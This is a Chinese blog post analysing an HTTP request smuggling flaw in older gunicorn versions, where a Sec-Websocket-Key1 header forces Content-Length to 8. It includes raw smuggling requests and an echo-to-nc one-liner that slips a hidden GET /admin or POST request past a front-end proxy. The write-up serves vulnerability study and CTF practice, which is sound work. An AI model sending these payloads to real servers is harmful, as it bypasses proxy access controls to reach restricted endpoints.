【WEB】gunicorn走私漏洞

已于 2023-06-16 09:37:55 修改
阅读量1.6k 收藏 3
点赞数 2
分类专栏: 云安全 文章标签: gunicorn
于 2022-12-16 14:57:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/128342729
版权

gunicorn走私漏洞

  • 源码:https://github.com/benoitc/gunicorn
  • 漏洞定位:https://github.com/benoitc/gunicorn/blob/20.x/gunicorn/http/message.py#142

漏洞分析

在这里插入图片描述
只要header里面存在Sec-Websocket-Key1
那么就将content_length强制赋值为8
比较简单直接构造POC

POC

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

gunicorn会认为上述请求是两个请求


GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxx


GET /other HTTP/1.1
Host: example.com

但其他的代理服务器则会认为是一个请求,因为没有Sec-Websocket-Key1的逻辑

那么借此就可以绕过gunicorn之外的一些服务器的限制

利用

在这里插入图片描述

例如前端haproxy拒绝访问POST请求,但是gunicorn可以访问
则可以利用上述POC构造

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxPOST /other HTTP/1.1
Host: example.com

关于Content-Length如何构造

在这里插入图片描述
burp开启自动更新则可以计算body的大小
关闭则可以自己repeat poc

或者使用命令行nc

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 68\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /admin HTTP/1.1\r\nHost: localhost\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 9999

这里需要自己计算不同的content-length在不同的proxy中的请求体内容。

_HWHXY
关注
专栏目录
http请求走私漏洞原理,利用,检测,防护
墨痕诉清风的博客
11-24 2709
当今的web架构中,单纯的一对一客户端---服务端结构已经逐渐过时。前端服务器与后端服务器。前端服务器(例如代理服务器)负责安全控制,只有被允许的请求才能转发给后端服务器,而后端服务器无条件的相信前端服务器转发过来的全部请求,并对每一个请求都进行响应。但是在这个过程中要保证前端服务器与后端服务器的请求边界设定一致,如果前后端服务器对请求包处理出现差异,那么就可能导致攻击者通过发送一个精心构造的http请求包,绕过前端服务器的安全策略直接抵达后端服务器访问到原本禁止访问的服务或接口,这就是http请求走私
gunicorn
shujufenxishi的博客
04-09 704
Gunicorn是一个 Python 的 WSGI HTTP 服务器。它所在的位置通常是在反向代理(如 Nginx)和一个 web 应用(如django)之间,支持eventlet也支持greenlet。Gunicorn启动项目之后一定会有一个主进程Master和一个或者多个工作进程。工作进程的数量可以指定。工作进程是实际处理请求的进程。主进程维护服务器的运行。
gunicorn 20.0.4 请求走私漏洞
qq_61142406的博客
05-26 1882
某比赛的一个题,不知道结束没有,就不说名字了 gunicorn <= 20.0.4,无论在gunicorn 前使用哪个代理,该漏洞都有效, Http头中的 Sec-Websocket-Key: 1 会进行特殊解析,从而引发此漏洞 /fl4g禁止访问 payload: echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTT
mysql+init+内存泄漏_内存泄漏 - gunicorn + django + mysqldb
weixin_39928003的博客
02-02 314
我的gunicorn + django 1.5.1 + mysqldb中有内存泄漏。我开始用gc和objgraph探索我的代码当gunicorn工人超过300mb时,我收集了一些统计数据:data['sum_leak'] = sum((getsizeof(o) for o in objgraph.get_leaking_objects())) #2 mbdata['total_objects_l...
高并发部署:使用Gunicorn、Flask和Docker构建稳健的Web应用
最新发布
y131673的博客
08-03 277
在现代Web应用程序开发中,高并发处理是一个关键挑战。为了有效地处理大量并发请求并保持应用的稳定性,我们可以利用Gunicorn、Flask和Docker这些强大的工具和技术组合。
gunicorn版本bug造成flask请求无法接受请求参数
u012132349的博客
03-25 1077
一般地,生产环境只能用gunicorn命令启动python服务,如果在模拟请求方访问服务时发现服务端始终接收不到请求传入的业务参数。 那么有可能是gunicorn版本较低的原因,我当时的版本是19.X,升级至20.0.4版本即可(其他版本待测)。 ...
supervisor + gunicorn 的坑
happy42779的博客
12-03 1445
在尝试使用supervisor 来守护 gunicorn启动的web服务时,遇到了一个小坑,但是这个小坑却耽误了不少时间! 建议: 安装有3中方式: 1.系统安装,这样安装的是系统全局的,系统会使用python2来运行,所以弃用这个方式。 2. 全局pip, 使用pip3 install supervisor 可以安装,但是安装后需要进入到很深的全局包的目录才能运行,如 /usr/loca...
HTTP 请求走私
Sentiment的博客
05-05 1768
HTTP 请求走私是一种用于干扰网站处理从一个或多个用户接收的 HTTP 请求序列的方式的技术。请求走私漏洞通常本质上至关重要,允许攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。 漏洞成因 HTTP规范提供了两种不同的方法来指定请求的结束位置:Content-Length标头和Transfer-Encoding标头,若同一请求前端与后端所使用的规范不同就可能导致解析差异,从而造成请求走私。一般服务器有三种解析方式: CL.TE:前端服务器使用Conten
Unicode漏洞
得峰的专栏 [网络收藏]
05-07 1390
  Unicode漏洞可以说是目前最热门的漏洞了,关于Unicode漏洞原理的文章有很多了,我们初学者没有必要搞清除那些,通过本篇《Unicode漏洞入侵图文讲解》,先来看看具体的使用。 一、准备工具   Rangsc
Django下的Race Condition漏洞
qq_68163788的博客
11-13 2564
竞争型漏洞是一种存在于软件或系统中的安全漏洞,它允许攻击者利用系统中的竞争条件来执行恶意操作。这种漏洞通常涉及多个并发操作或资源竞争,攻击者可以利用这些竞争条件来绕过安全控制,获取未授权的访问权限或执行拒绝服务攻击。 竞争型漏洞可能出现在各种不同的软件和系统中,包括操作系统、网络协议、数据库和应用程序等。攻击者通常会利用这些漏洞来执行特权升级、信息泄露或拒绝服务攻击等恶意操作。 为了防止竞争型漏洞的利用,软件开发者和系统管理员需要及时修补漏洞,并采取适当的安全措施来减少竞争条件的存在。
Gunicorn运行与配置方法
09-14
Gunicorn,全称为Green Unicorn,是一款高性能的Python WSGI(Web Server Gateway Interface)服务器,其设计灵感来源于Ruby的Unicorn项目。WSGI是Python Web应用程序与Web服务器之间的一个接口标准,使得不同的Web...
uvicorn-gunicorn-fastapi-docker:由Gunicorn管理的带有Uvicorn的Docker映像,用于Python 3.6及更高版本中的高性能FastAPI Web应用程序,并具有性能自动调整功能。 可选搭配Alpine Linux
02-02
例如tiangolo/uvicorn-gunicorn-fastapi:python3.7-2019-10-15 。 uvicorn-gunicorn-fastapi 与图像管理由为高性能在Web应用程序 3.6及以上,性能自动调整。 可以选择是苗条版本或基于Alpine Linux。 GitHub存储...
HAProxy——http请求走私漏洞(CVE-2021-40346)分析
weixin_50464560的博客
09-24 3884
漏洞信息在9月7号,JFrog安全研究团队发布了一个HAProxy的严重漏洞的信息。HAProxy是一个使用C语言编写的自由及开放源代码软件,其提供高可用性、负载均衡,以及基于TCP和HTTP的应用程序代理。 HAProxy特别适用于那些负载特大的web站点,这些站点通常又需要会话保持或七层处理。HAProxy运行在当前的硬件上,完全可以支持数以万计的并发连接。并且它的运行模式使得它可以很简单安全的整合进架构中, 同时可以保护web服务器不被暴露到网络上。 此漏洞编号为CVE-2021-40346,是一个整
掌控安全腾龙杯2024(WEB方向)
Zue3r的博客
03-19 2123
掌控安全腾龙杯2024(WEB方向)
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发现的Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 688
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
ISCC-2022
ki10Moc的博客
06-06 4082
pyccwp
ISCC 2022 部分
BvxiE的博客
06-10 1451
这里写自定义目录标题 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is_numeric(@$info["year"])?die("Sorry~"):NULL; if(@$info["year"]){ ($inf
JumpServer 远程执行漏洞 2021-01-15
黄树茂博客
03-08 489
2021年1月15日 JumpServer 发现远程执行漏洞 非常感谢reactivity of Alibaba Hackerone bug bounty program(瑞典) 向我们报告了此 BUG 影响版本: < v2.6.2 < v2.5.4 < v2.4.5 = v1.5.9 >= v1.5.3 安全版本: >= v2.6.2 >= v2.5.4 >= v2.4.5 = v1.5.9 (版本号没变) < v1.5.3 修复方.
JumpServer 远程代码执行漏洞
热门推荐
江左盟的博客
01-24 2万+
目录 简介 漏洞原理 影响版本 漏洞分析 漏洞利用 修复方法 Poc Exp 参考文章 简介 JumpServer 是全球首款开源的堡垒机,使用 GNU GPL v2.0 开源协议,是符合 4A 规范的运维安全审计系统。JumpServer 使用 Python / Django 为主进行开发,遵循 Web 2.0 规范,配备了业界领先的 Web Terminal 方案,交互界面美观、用户体验好。JumpServer 采纳分布式架构,支持多机房跨区域部署,支持横向扩展,无资产数量及并发限
gunicorn部署web程序
06-07
Gunicorn是一个Python WSGI HTTP服务器,可以将Python Web应用程序部署到生产环境中。以下是使用Gunicorn部署Python Web应用程序的一般步骤: 1. 安装Gunicorn:可以使用pip命令来安装Gunicorn,如下所示: ``` pip install gunicorn ``` 2. 编写Gunicorn配置文件:可以创建一个名为`gunicorn.conf.py`的Python模块文件,并在文件中指定Gunicorn的配置选项,如下所示: ```python # gunicorn.conf.py bind = "127.0.0.1:8000" workers = 4 worker_class = "gevent" ``` 上面的配置选项指定了Gunicorn监听在`127.0.0.1:8000`地址上,使用4个worker进程,使用gevent worker类。 3. 启动Gunicorn服务器:可以使用以下命令启动Gunicorn服务器: ``` gunicorn app:app -c gunicorn.conf.py ``` 上面的命令中,`app:app`指定了Python Web应用程序的入口点,`-c`选项指定了Gunicorn配置文件的位置。 4. 配置反向代理:如果需要通过域名访问Web应用程序,则需要配置反向代理,将HTTP请求转发给Gunicorn服务器。常用的反向代理服务器有Nginx和Apache,可以根据实际情况选择合适的服务器进行配置。 以上是使用Gunicorn部署Python Web应用程序的一般步骤。需要注意的是,在部署Web应用程序之前,需要确保Web应用程序符合WSGI标准,并且在本地环境中可以正常运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值